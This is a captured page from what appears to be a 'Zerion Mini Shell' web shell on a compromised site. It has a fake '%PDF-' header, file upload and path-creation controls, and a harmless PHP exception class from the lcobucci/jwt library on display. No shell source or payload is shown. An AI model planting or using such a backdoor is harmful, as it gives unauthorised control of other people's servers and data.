%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/graphicd/public_html/vebto/vendor/lcobucci/jwt/src/Signer/
Upload File :
Create Path :
Current File : /home/graphicd/public_html/vebto/vendor/lcobucci/jwt/src/Signer/CannotSignPayload.php

<?php

namespace Lcobucci\JWT\Signer;

use InvalidArgumentException;
use Lcobucci\JWT\Exception;

final class CannotSignPayload extends InvalidArgumentException implements Exception
{
    /**
     * @pararm string $error
     *
     * @return self
     */
    public static function errorHappened($error)
    {
        return new self('There was an error while creating the signature: ' . $error);
    }
}

Zerion Mini Shell 1.0